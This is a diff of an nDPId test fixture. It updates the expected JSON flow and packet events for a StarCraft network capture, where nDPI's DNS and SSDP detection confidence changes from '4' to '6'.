{"query":"26.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"26.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1437389954544,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389954544,"pkt":"IImEa8W6hCYVPnXECABFAABIAABAAEARtfLAqAH+wKgBZAA15c8ANGxA5FmBgwABAAAAAAAAAzI1NAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} 
-00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389954543,"flow_last_seen":1437389954544,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954544,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1437389954714,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"26.186.239.80.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389954543,"flow_last_seen":1437389954544,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954544,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1437389954714,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"26.186.239.80.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389955642,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437389955642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389955642,"pkt":"IImEa8W6hCYVPnXECABFAAAo31oAAPMGG1FQ77oowKgBZAG7DZa8aq6WRaVMa1AU+bLclgAAAAAAAAAA"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955670,"flow_last_seen":1437389955670,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1437389955670,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -29,19 +29,19 @@ 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1437389955696,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1437389955696,"pkt":"hCYVPnXEIImEa8W6CABFAABFDD0AAIARlobAqAFkrcIoFtFAAbsAMXj5DBnPzxTN69maKsxX+B31W\/+0ERxkBS+pEu\/Lu7MhCuhfcS4mTXYS47w="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955747,"flow_last_seen":1437389955747,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389955747,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1437389955747,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389955747,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2IAAIARVpDAqAFkwKgB\/uXcADUANLhfizwBAAABAAAAAAAAAjQwAzE4NgMyMzkCODAHaW4tYWRkcgRhcnBhAAAMAAE="} 
-00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955747,"flow_last_seen":1437389955747,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389955747,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955747,"flow_last_seen":1437389955747,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389955747,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1437389955800,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"thread_ts_msec":1437389955800,"pkt":"IImEa8W6hCYVPnXECABFAABuAABAAEARtczAqAH+wKgBZAA15dwAWs2+izyBgAABAAEAAAAAAjQwAzE4NgMyMzkCODAHaW4tYWRkcgRhcnBhAAAMAAHADAAMAAEAAC+XABoNODAtMjM5LTE4Ni00MAZhdHRlbnMDbmV0AA=="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389955800,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389955800,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955932,"flow_last_seen":1437389955932,"flow_idle_time":7580000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1437389955932,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1437389955932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1437389955932,"pkt":"hCYVPnXEIImEa8W6CABFAAApUQNAAIAGOxbAqAFk2DrUbgvsAbu4rIxVQhQWM1AQAPyVMQAAAA=="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1437389955967,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389955967,"pkt":"IImEa8W6hCYVPnXECABFAAA0zAIAADUGSwzYOtRuwKgBZAG7C+xCFBYzuKyMVoAQAofTiQAAAQEFCrisjFW4rIxW"} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1437389956550,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389956550,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2MAAIARVo\/AqAFkwKgB\/uXjADUANNVsy9IBAAABAAAAAAAAAjIyAjQwAzE5NAMxNzMHaW4tYWRkcgRhcnBhAAAMAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"22.40.194.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"22.40.194.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1437389956550,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1437389956550,"pkt":"hCYVPnXEIImEa8W6CABFAABJX2QAAIARVo3AqAFkwKgB\/uXjADUANaawlcQBAAABAAAAAAAAAzExMAMyMTICNTgDMjE2B2luLWFkZHIEYXJwYQAADAAB"} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"110.212.58.216.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1437389956552,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1437389956552,"pkt":"IImEa8W6hCYVPnXECABFAACPAABAAEARtavAqAH+wKgBZAA15eMAe9\/glcSBgAABAAIAAAAAAzExMAMyMTICNTgDMjE2B2luLWFkZHIEYXJwYQAADAABwAwADAABAABT2QAcEG1pbDAxczI1LWluLWYxMTAFMWUxMDADbmV0AMAMAAwAAQAAU9kAEg9taWwwMXMyNS1pbi1mMTTASg=="} 
-00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389956550,"flow_last_seen":1437389956552,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1437389956552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389956550,"flow_last_seen":1437389956552,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1437389956552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389958129,"flow_last_seen":1437389958129,"flow_idle_time":7580000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1437389958129,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1437389958129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1437389958129,"pkt":"hCYVPnXEIImEa8W6CABFAAA3SKVAAIAGzl7AqAFkUO\/QwQ1jBF+OUzht5cVUn1AY+ehDuQAA00l1ne7IFusS1wyd32Yu"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1437389958226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389958226,"pkt":"IImEa8W6hCYVPnXECABFAAAoVBZAADQGDv1Q79DBwKgBZARfDWPlxVSfjlM4fFAQPaJ7fgAAAAAAAAAA"} 
@@ -52,7 +52,7 @@ 00360{"packet_event_id":1,"packet_event_name":"packet","packet_id":28,"source":"starcraft_battle.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":35020,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":1437389961598,"pkt":"AYDCAAAOIImEa8W6iMwCBwQgiYRrxboEBwMgiYRrxboGAg4R\/gkAEg8BAwABAAD+BwASuwEAAQEAAA=="} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":200000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00958{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1437389963466,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":423,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":423,"pkt_l4_len":389,"thread_ts_msec":1437389963466,"pkt":"AQBef\/\/6hCYVPnXECABFAAGZAABAAAERxbPAqAH+7\/\/\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"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":200000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":200000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00946{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1437389963467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"thread_ts_msec":1437389963467,"pkt":"AQBef\/\/6hCYVPnXECABFAAGQAABAAAERxbzAqAH+7\/\/\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"} 
00958{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1437389963467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":423,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":423,"pkt_l4_len":389,"thread_ts_msec":1437389963467,"pkt":"AQBef\/\/6hCYVPnXECABFAAGZAABAAAERxbPAqAH+7\/\/\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"} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1437389964511,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437389964511,"pkt":"hCYVPnXEIImEa8W6CABFAAA8SKZAAIAGzljAqAFkUO\/QwQ1jBF+OUzh85cVUn1AY+eiiKgAAgb8pIAfuTigNRzF0YIhRn73AbVc="} 
